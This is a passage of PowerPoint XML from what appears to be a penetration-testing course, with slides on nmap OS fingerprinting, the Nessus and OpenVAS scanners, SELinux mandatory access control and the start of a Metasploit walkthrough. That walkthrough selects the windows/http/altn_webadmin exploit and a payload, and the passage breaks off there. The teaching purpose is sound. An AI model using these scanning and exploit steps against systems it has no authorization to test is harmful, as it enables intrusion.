            <a:endParaRPr lang="it-IT" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{27258C4A-737F-4E03-9EF0-000ABF84CF1A}"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255F15E1-9799-48DC-B925-F0B277BB03D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>42</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265195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Identify target OS version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="1071563"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>OS Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: there are different values for each OS (Ex. TCP stack, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ex: Nmap –O &lt;target&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2857500"/>
          <a:ext cx="9161463" cy="3429000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1026" name="Worksheet" r:id="rId4" imgW="6553319" imgH="2124015" progId="Excel.Sheet.8">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Worksheet" r:id="rId4" imgW="6553319" imgH="212401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57500"/>
                        <a:ext cx="9161463" cy="3429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Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FFDE4752-4FAD-4CB6-A8D6-1F9FBC0C5CE5}"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8975050E-239C-4EBB-A792-54DA1D81F854}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>43</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015283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Vulnerability scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1196975"/>
            <a:ext cx="8208962" cy="5256213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is a leader tool in vulnerability scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>There are two components :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>nessusd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> server with plugins’ list of known vulnerabilities (there are different kinds of subscription depending on how old are plugins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is a front end of the tool there are several version for windows and linux systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25604" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8115300" y="260350"/>
            <a:ext cx="1028700" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7AE85F54-95A2-4C8E-A258-F468AC76B73D}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2E58CC97-1C2F-4080-B24A-2AF224B90279}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 6"/>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162634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Introduction to Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Created by Renaud Deraison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Currently Maintained by Tenable Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Uses the NASL Scripting language for it’s plugins (currently over 13,000 plugins!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Price is still Free! But no more open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Register to obtain many NASL plugins (7 day delay).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Or Purchase a Direct Feed for the Latest!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1EA149B4-2A9B-43F6-9B13-493033FAABD5}"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80A1EF53-4E17-493B-AD86-782C8E3BD1D8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>45</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2012900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Nessus Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Client/Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>SSL/PKI supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Smart Service Recognition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(i.e. FTP on 31337)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Non-Destructive or Thorough Tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Vulnerability Mapping to CVE, Bugtraq, and others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Vulnerability Scoring using CVSS from NIST.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8E59515D-2E05-4ED9-A54B-1A41325A215A}"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0265CB1C-87EE-48E0-B770-CD5AB7F42456}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>46</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8824711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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>OpenSource Vulnerability Assessment Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Previously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>GNessUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (a GPL fork of the Nessus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OpenVAS is a security scanner to allow future free development of the now-proprietary NESSUS tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OpenVAS now offers 15’000 Network Vulnerability Tests (NVTs) more all NASL plugins.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B143DC48-C990-4FDF-B2A5-6F83475738BE}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E7D093B3-7471-4DB0-94A7-A971E5125E75}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2784029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it-IT" smtClean="0"/>
              <a:t>Open VAS technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{020ADC3E-632C-4862-9E5B-A5E32F0258AC}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{967E0BC9-A2C1-4777-BC48-A729865FBAD9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29703" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1360488"/>
            <a:ext cx="8305800" cy="5040312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925154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Exploit vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is a framework that allows to perform real attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You need to start metasploit from the start menu </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Penetration Test-&gt;Framework 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{821823BF-14F0-43EC-8AA8-6F10FBE08598}"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FDBF6716-7380-4184-BABA-F632DE8054F9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>49</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060435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Mandatory Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7848600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a more restrictive scheme that does not allow users to define permissions on files, regardless of ownership. Instead, security decisions are made by a central policy administrator. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each security rule consists of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>subject, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which represents the party attempting to gain access, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>object, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>referring to the resource being accessed, and a series of permissions that define the extent to which that resource can be accessed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security-Enhanced Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>incorporates mandatory access control.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Select the exploit and the payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> exploit: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> windows/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select the payload for the exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(setting the PAYLOAD global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>datastore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
